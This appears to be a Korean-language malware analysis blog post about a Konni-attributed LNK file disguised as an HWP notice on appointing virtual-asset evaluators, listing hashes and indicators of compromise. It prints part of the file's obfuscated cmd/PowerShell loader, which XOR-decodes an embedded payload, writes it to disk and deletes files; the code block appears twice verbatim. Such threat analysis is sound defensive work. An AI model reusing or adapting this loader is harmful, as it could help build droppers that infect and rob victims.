북한 해킹 단체 코니(Konni) 에서 만든 악성코드-가상자산 관련 외부평가위원 위촉 안내.hwp(2025.5.2)
Contents
오늘도 대한민국의 안보를 겁나게 위협하는 북한 정찰총국에서 활동 중인 김수키(Kimsuky),라자루스(Lazarus)와 자매 관계인 코니(Konni)에서 가상화폐(암호화폐)를 훔치려고 만들어진 HWP 문서로 위장하는 악성코드인 가상자산 관련 외부평가위원 위촉 안내·hwp(2025.5.2)를 분석을 해보겠습니다.
파일명:가상자산 관련 외부평가위원 위촉 안내.hwp.lnk
사이즈:2 MB
MD5:cbd734874b44e73ce155998db7e6663a
SHA-1:eb4e370782f214d376c6041a06140868ba5f432d
SHA-256:f9f3b762ed1719bf141c38f8c4f21d76cd65c5ac6c62a4b94ce68569ce87178c
이며 악성코드 내부에서는 Powershell를 악용을 해서 해당 악성코드가 동작하면 미끼 파일은 HWP 로 만들어 놓은 것을 확인할 수가 있습니다.
악성코드 내부
StringData
{
namestring: hwp File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\WindowsPowershell\*(.)exe ^|
findstr /i rshell.exe') do (if exist "%f" (%f "function bother{param($result); <#pursue cou
rage#>$access = $result.substring(0,$result.l(e)ngth-4) + ''; <#red left#>return $access;};f
unction emergency{param($propose); re''m''o(v)''e''-it''e''m $propose -Force;};function disc
ourse{param($orientation,$protecti(o)n,$signal,$comment,$comedy);<#station apple#> $egg=N'
'ew''-''O''bj''ect System.IO.FileStream(<#shadow immediate#>$orientation,<#normal get#>[
System(.I)O.FileMode]::Open,<#neck pause#>[System.IO.FileAccess]::Read);<#collection fo
cus#> $egg.Seek(<#one care#>$protection,[System.IO.See(kO)rigin]::Begin);<#mood which#>
$present=$signal*0x01;<#clas(s)(i)c professor#> $truth=New''-O''bj''ect byte[] <#etc mos
tly#>$signal; <#chef consequence#(>) $consume=Ne''w-''Obj''ec''t byte[] <#ancient visibl
e#>$pre(s)ent; <#crack occupy#>$egg.Read(<#exercise actually#>$consume,0,<#encounter car
ef(ul)ly#>$present); $egg.Close();$stream=0;while($stream -lt $(s)ignal){<#claim thank#>
$truth[$stream]=$consume[$stream*0x(0)1] -bxor $comment;$stream++;}<#subsequent bathroom
#> s''e(t)-''c''o''n''(t)''ent $comedy <#block greatest#> $truth -(E)ncoding <#comedy co
uncil#> Byte;};fu(n0ction massive{$enter = $env:public<#heavy deeply#> + '\' +<#guess pr
oud#> 'do'(+)'cu'(+)'m'+'en'+'ts(');<#incredible coat#> retu(r)n $enter;};funct(i)on hab
it{param($con(n)ection); <#here co(n)trol#>$ag(r)eement = Spl''it''-Pa''th $connection;<
#giant t(a)il#> …
파일명:가상자산 관련 외부평가위원 위촉 안내.hwp.lnk
사이즈:2 MB
MD5:cbd734874b44e73ce155998db7e6663a
SHA-1:eb4e370782f214d376c6041a06140868ba5f432d
SHA-256:f9f3b762ed1719bf141c38f8c4f21d76cd65c5ac6c62a4b94ce68569ce87178c
이며 악성코드 내부에서는 Powershell를 악용을 해서 해당 악성코드가 동작하면 미끼 파일은 HWP 로 만들어 놓은 것을 확인할 수가 있습니다.
악성코드 내부
StringData
{
namestring: hwp File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\WindowsPowershell\*(.)exe ^|
findstr /i rshell.exe') do (if exist "%f" (%f "function bother{param($result); <#pursue cou
rage#>$access = $result.substring(0,$result.l(e)ngth-4) + ''; <#red left#>return $access;};f
unction emergency{param($propose); re''m''o(v)''e''-it''e''m $propose -Force;};function disc
ourse{param($orientation,$protecti(o)n,$signal,$comment,$comedy);<#station apple#> $egg=N'
'ew''-''O''bj''ect System.IO.FileStream(<#shadow immediate#>$orientation,<#normal get#>[
System(.I)O.FileMode]::Open,<#neck pause#>[System.IO.FileAccess]::Read);<#collection fo
cus#> $egg.Seek(<#one care#>$protection,[System.IO.See(kO)rigin]::Begin);<#mood which#>
$present=$signal*0x01;<#clas(s)(i)c professor#> $truth=New''-O''bj''ect byte[] <#etc mos
tly#>$signal; <#chef consequence#(>) $consume=Ne''w-''Obj''ec''t byte[] <#ancient visibl
e#>$pre(s)ent; <#crack occupy#>$egg.Read(<#exercise actually#>$consume,0,<#encounter car
ef(ul)ly#>$present); $egg.Close();$stream=0;while($stream -lt $(s)ignal){<#claim thank#>
$truth[$stream]=$consume[$stream*0x(0)1] -bxor $comment;$stream++;}<#subsequent bathroom
#> s''e(t)-''c''o''n''(t)''ent $comedy <#block greatest#> $truth -(E)ncoding <#comedy co
uncil#> Byte;};fu(n0ction massive{$enter = $env:public<#heavy deeply#> + '\' +<#guess pr
oud#> 'do'(+)'cu'(+)'m'+'en'+'ts(');<#incredible coat#> retu(r)n $enter;};funct(i)on hab
it{param($con(n)ection); <#here co(n)trol#>$ag(r)eement = Spl''it''-Pa''th $connection;<
#giant t(a)il#> …
IoC
cbd734874b44e73ce155998db7e6663a
eb4e370782f214d376c6041a06140868ba5f432d
f9f3b762ed1719bf141c38f8c4f21d76cd65c5ac6c62a4b94ce68569ce87178c
eb4e370782f214d376c6041a06140868ba5f432d
f9f3b762ed1719bf141c38f8c4f21d76cd65c5ac6c62a4b94ce68569ce87178c